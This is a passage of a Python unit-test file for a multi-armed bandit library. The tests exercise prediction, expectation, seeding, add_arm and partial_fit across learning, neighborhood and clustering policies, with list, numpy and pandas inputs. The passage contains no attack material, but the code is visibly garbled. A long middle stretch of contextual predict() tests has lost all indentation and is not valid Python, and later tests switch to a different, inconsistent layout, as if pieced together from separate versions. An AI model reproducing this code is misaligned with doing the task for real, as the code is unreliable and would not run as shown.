                                          [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
                         contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
    def test_decision_reward_array(self):
        """Both decisions and rewards may be numpy arrays."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
        for lp in MABTest.para_lps:
            self.predict(arms=[1, 2, 3],
                         decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
                                          [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
                                          [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
                         contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
    def test_decision_series_reward_array(self):
        """Mixed input types: Series decisions with array rewards."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
        for lp in MABTest.para_lps:
            self.predict(arms=[1, 2, 3],
                         decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
                                          [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
                                          [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
                         contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
    def test_decision_array_reward_series(self):
        """Mixed input types: array decisions with Series rewards."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
        for lp in MABTest.para_lps:
            self.predict(arms=[1, 2, 3],
                         decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
                                          [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
                                          [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3]],
                         contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=True)
#################################################
# Test context free predict_expectation() method
################################################
    def test_exp_arm_list_int(self):
        """Expectation path (is_predict=False) with integer arm labels."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=False)
    def test_exp_arm_list_str(self):
        """Expectation path with string arm labels."""
        for lp in MABTest.lps:
            self.predict(arms=["A", "B", "C"],
                         decisions=["A", "A", "A", "B", "B", "B", "C", "C", "C"],
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=False)
    def test_exp_decision_series(self):
        """Expectation path with Series decisions."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=False)
    def test_exp_reward_series(self):
        """Expectation path with Series rewards."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
                         rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=False)
    def test_exp_decision_reward_series(self):
        """Expectation path with Series decisions and rewards."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=False)
    def test_exp_decision_array(self):
        """Expectation path with array decisions."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=False)
    def test_exp_reward_array(self):
        """Expectation path with array rewards."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
                         rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=False)
    def test_exp_decision_reward_array(self):
        """Expectation path with array decisions and rewards."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=False)
    def test_exp_decision_series_reward_array(self):
        """Expectation path with Series decisions and array rewards."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=False)
    def test_exp_decision_array_reward_series(self):
        """Expectation path with array decisions and Series rewards."""
        for lp in MABTest.lps:
            self.predict(arms=[1, 2, 3],
                         decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
                         rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
                         learning_policy=lp,
                         seed=123456,
                         num_run=1,
                         is_predict=False)
    def test_context_history_series(self):
        """context_history given as a single pandas Series column is accepted."""
        contexts = pd.DataFrame({'column1': [1, 2, 3], 'column2': [2, 3, 1]})
        for lp in BaseTest.para_lps:
            arm, mab = self.predict(arms=[0, 1],
                                    decisions=[1, 1, 1],
                                    rewards=[0, 0, 0],
                                    learning_policy=lp,
                                    context_history=contexts['column1'],
                                    contexts=[[1]],
                                    seed=123456,
                                    num_run=1,
                                    is_predict=True)
            # A single-column history must yield a 1-feature model.
            self.assertEqual(mab._imp.arm_to_model[0].beta.shape[0], 1)
        for cp in BaseTest.nps:
            for lp in BaseTest.lps:
                # TreeBandit is excluded here in addition to incompatible combos.
                if not self.is_compatible(lp, cp) or isinstance(cp, NeighborhoodPolicy.TreeBandit):
                    continue
                arm, mab = self.predict(arms=[0, 1],
                                        decisions=[1, 1, 1],
                                        rewards=[0, 0, 0],
                                        learning_policy=lp,
                                        neighborhood_policy=cp,
                                        context_history=contexts['column1'],
                                        contexts=[[1]],
                                        seed=123456,
                                        num_run=1,
                                        is_predict=True)
                # Tree Bandit does not store contexts
                if not isinstance(cp, NeighborhoodPolicy.TreeBandit):
                    self.assertEqual(np.ndim(mab._imp.contexts), 2)
        for cp in BaseTest.cps:
            for lp in BaseTest.lps:
                if not self.is_compatible(lp, cp):
                    continue
                arm, mab = self.predict(arms=[0, 1],
                                        decisions=[1, 1, 1],
                                        rewards=[0, 0, 0],
                                        learning_policy=lp,
                                        neighborhood_policy=cp,
                                        context_history=contexts['column1'],
                                        contexts=[[1]],
                                        seed=123456,
                                        num_run=1,
                                        is_predict=True)
                # Tree Bandit does not store contexts
                if not isinstance(cp, NeighborhoodPolicy.TreeBandit):
                    self.assertEqual(np.ndim(mab._imp.contexts), 2)
    def test_context_series(self):
        """Both context_history and prediction contexts may be pandas Series."""
        contexts = pd.DataFrame({'column1': [1, 2, 3, 3, 2, 1], 'column2': [2, 3, 1, 1, 2, 3]})
        for lp in BaseTest.para_lps:
            arm, mab = self.predict(arms=[0, 1],
                                    decisions=[1, 1, 1, 1, 1, 1],
                                    rewards=[0, 0, 0, 0, 0, 0],
                                    learning_policy=lp,
                                    context_history=contexts['column1'],
                                    contexts=pd.Series([1]),
                                    seed=123456,
                                    num_run=1,
                                    is_predict=True)
            # A single-column history must yield a 1-feature model.
            self.assertEqual(mab._imp.arm_to_model[0].beta.shape[0], 1)
        for cp in BaseTest.nps:
            for lp in BaseTest.lps:
                if not self.is_compatible(lp, cp):
                    continue
                arm, mab = self.predict(arms=[0, 1],
                                        decisions=[1, 1, 1, 1, 1, 1],
                                        rewards=[0, 0, 0, 0, 0, 0],
                                        learning_policy=lp,
                                        neighborhood_policy=cp,
                                        context_history=contexts['column1'],
                                        contexts=pd.Series([1]),
                                        seed=123456,
                                        num_run=1,
                                        is_predict=True)
                # Tree Bandit does not store contexts
                if not isinstance(cp, NeighborhoodPolicy.TreeBandit):
                    self.assertEqual(np.ndim(mab._imp.contexts), 2)
        for cp in BaseTest.cps:
            for lp in BaseTest.lps:
                if not self.is_compatible(lp, cp):
                    continue
                arm, mab = self.predict(arms=[0, 1],
                                        decisions=[1, 1, 1, 1, 1, 1],
                                        rewards=[0, 0, 0, 0, 0, 0],
                                        learning_policy=lp,
                                        neighborhood_policy=cp,
                                        context_history=contexts['column1'],
                                        contexts=pd.Series([1]),
                                        seed=123456,
                                        num_run=1,
                                        is_predict=True)
                # Tree Bandit does not store contexts
                if not isinstance(cp, NeighborhoodPolicy.TreeBandit):
                    self.assertEqual(np.ndim(mab._imp.contexts), 2)
#################################################
# Test contextual predict() method
################################################
def test_context_arm_list_int(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_arm_list_str(self):
for lp in MABTest.para_lps:
self.predict(arms=["A", "B", "C", "D"],
decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=["A", "B", "C", "D"],
decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=["A", "B", "C", "D"],
decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, -2, 2, 3, 11], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, -5, 2, 3, 10], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, -2, 4, 3, 9], [20, 19, 18, 17, 16], [1, 2, 1, 1, 3],
[17, 18, 17, 19, 18]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_decision_series(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_reward_series(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_decision_reward_series(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_decision_array(self):
    """Contextual predict() where decisions are a numpy array and rewards a list."""
    decisions = np.array([1, 1, 1, 2, 2, 3, 3, 3, 3, 3])
    rewards = [0, 1, 1, 0, 0, 0, 0, 1, 1, 1]
    history = [[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
               [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
               [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
               [0, 2, 1, 0, 0]]

    def run(lp, cp=None):
        # Only pass neighborhood_policy when one is given, matching the two
        # call shapes used by the original per-policy loops.
        kwargs = dict(arms=[1, 2, 3, 4],
                      decisions=decisions,
                      rewards=rewards,
                      learning_policy=lp,
                      context_history=history,
                      contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                      seed=123456,
                      num_run=1,
                      is_predict=True)
        if cp is not None:
            kwargs['neighborhood_policy'] = cp
        self.predict(**kwargs)

    for lp in MABTest.para_lps:
        run(lp)
    for cp in MABTest.nps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                run(lp, cp)
    for cp in MABTest.cps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                run(lp, cp)
def test_context_reward_array(self):
    """Contextual predict() where decisions are a list and rewards a numpy array."""
    decisions = [1, 1, 1, 2, 2, 3, 3, 3, 3, 3]
    rewards = np.array([0, 1, 1, 0, 0, 0, 0, 1, 1, 1])
    history = [[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
               [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
               [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
               [0, 2, 1, 0, 0]]

    def run(lp, cp=None):
        # Only pass neighborhood_policy when one is given, matching the two
        # call shapes used by the original per-policy loops.
        kwargs = dict(arms=[1, 2, 3, 4],
                      decisions=decisions,
                      rewards=rewards,
                      learning_policy=lp,
                      context_history=history,
                      contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                      seed=123456,
                      num_run=1,
                      is_predict=True)
        if cp is not None:
            kwargs['neighborhood_policy'] = cp
        self.predict(**kwargs)

    for lp in MABTest.para_lps:
        run(lp)
    for cp in MABTest.nps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                run(lp, cp)
    for cp in MABTest.cps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                run(lp, cp)
def test_context_decision_reward_array(self):
    """Contextual predict() where decisions and rewards are both numpy arrays."""
    decisions = np.array([1, 1, 1, 2, 2, 3, 3, 3, 3, 3])
    rewards = np.array([0, 1, 1, 0, 0, 0, 0, 1, 1, 1])
    history = [[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
               [0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
               [0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
               [0, 2, 1, 0, 0]]

    def run(lp, cp=None):
        # Only pass neighborhood_policy when one is given, matching the two
        # call shapes used by the original per-policy loops.
        kwargs = dict(arms=[1, 2, 3, 4],
                      decisions=decisions,
                      rewards=rewards,
                      learning_policy=lp,
                      context_history=history,
                      contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
                      seed=123456,
                      num_run=1,
                      is_predict=True)
        if cp is not None:
            kwargs['neighborhood_policy'] = cp
        self.predict(**kwargs)

    for lp in MABTest.para_lps:
        run(lp)
    for cp in MABTest.nps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                run(lp, cp)
    for cp in MABTest.cps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                run(lp, cp)
#################################################
# Test random generator
################################################
def test_seed(self):
    """EpsilonGreedy predictions are deterministic for a fixed seed.

    Each (epsilon, seed) pair must reproduce the exact arm sequence
    recorded here, and the top-level rng must be the one used by the
    underlying implementation.
    """
    # (epsilon, seed, expected arm sequence over 4 runs)
    cases = [(0.25, 123456, [3, 3, 3, 3]),
             (0.25, 7, [2, 3, 3, 3]),
             (0.25, 79, [3, 3, 3, 2]),
             (0.33, 123456, [3, 3, 3, 3]),
             (0.33, 7, [2, 1, 1, 3]),
             (0.33, 79, [3, 3, 3, 2])]

    for epsilon, seed, expected in cases:
        arms, mab = self.predict(arms=[1, 2, 3],
                                 decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
                                 rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
                                 learning_policy=LearningPolicy.EpsilonGreedy(epsilon=epsilon),
                                 seed=seed,
                                 num_run=4,
                                 is_predict=True)
        self.assertEqual(len(arms), 4)
        self.assertEqual(arms, expected)
        self.assertIs(mab._rng, mab._imp.rng)
def test_set_rng(self):
    """The MAB-level rng is the same object used by the implementation.

    For contextual variants the rng must also be shared with the inner
    learning policy (single shared lp for neighborhood policies, one lp
    per cluster for clustering policies).
    """
    for lp in list(MABTest.lps) + list(MABTest.para_lps):
        mab = MAB([0, 1], lp)
        self.assertIs(mab._rng, mab._imp.rng)

    for cp in MABTest.nps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                mab = MAB([0, 1], lp, cp)
                self.assertIs(mab._rng, mab._imp.rng)
                self.assertIs(mab._rng, mab._imp.lp.rng)

    for cp in MABTest.cps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                mab = MAB([0, 1], lp, cp)
                self.assertIs(mab._rng, mab._imp.rng)
                self.assertIs(mab._rng, mab._imp.lp_list[0].rng)
#################################################
# Test add_arm() method
################################################
def test_add_arm(self):
    """add_arm() registers new arms (int and str) on the mab and its implementation."""
    for lp in MABTest.lps:
        mab = MAB([0, 1], lp)
        for new_arm, expected_count in ((2, 3), ('a', 4)):
            mab.add_arm(new_arm)
            self.assertTrue(new_arm in mab.arms)
            self.assertTrue(len(mab._imp.arms) == expected_count)
            self.assertTrue(new_arm in mab._imp.arm_to_expectation.keys())
def test_add_arm_contextual(self):
    """add_arm() keeps arm bookkeeping in sync for contextual bandits."""
    new_arms = ((2, 3), ('a', 4))

    for lp in MABTest.para_lps:
        mab = MAB([0, 1], lp)
        for new_arm, expected_count in new_arms:
            mab.add_arm(new_arm)
            self.assertTrue(new_arm in mab.arms)
            self.assertTrue(len(mab._imp.arms) == expected_count)
            self.assertTrue(new_arm in mab._imp.arm_to_expectation.keys())

    def check(mab, inner):
        # The inner learning policy must track the same arm set as the
        # top-level implementation.
        for new_arm, expected_count in new_arms:
            mab.add_arm(new_arm)
            self.assertTrue(new_arm in mab.arms)
            self.assertTrue(len(mab._imp.arms) == expected_count)
            self.assertTrue(len(inner.arms) == expected_count)
            self.assertTrue(new_arm in inner.arm_to_expectation.keys())

    for cp in MABTest.nps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                mab = MAB([0, 1], lp, cp)
                check(mab, mab._imp.lp)

    for cp in MABTest.cps:
        for lp in MABTest.lps:
            if self.is_compatible(lp, cp):
                mab = MAB([0, 1], lp, cp)
                check(mab, mab._imp.lp_list[0])
#################################################
# Test partial_fit() method
################################################
def test_partial_fit(self):
    """partial_fit() runs cleanly after an initial context-free fit and predict."""
    for lp in MABTest.lps:
        _, mab = self.predict(arms=["A", "B", "C", "D"],
                              decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
                              rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
                              learning_policy=lp,
                              seed=123456,
                              num_run=1,
                              is_predict=True)
        # Online update with two new observations.
        mab.partial_fit(["A", "B"], [0, 0])
def test_partial_fit_contextual(self):
    """partial_fit() runs cleanly after an initial contextual fit and predict."""
    history = [[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
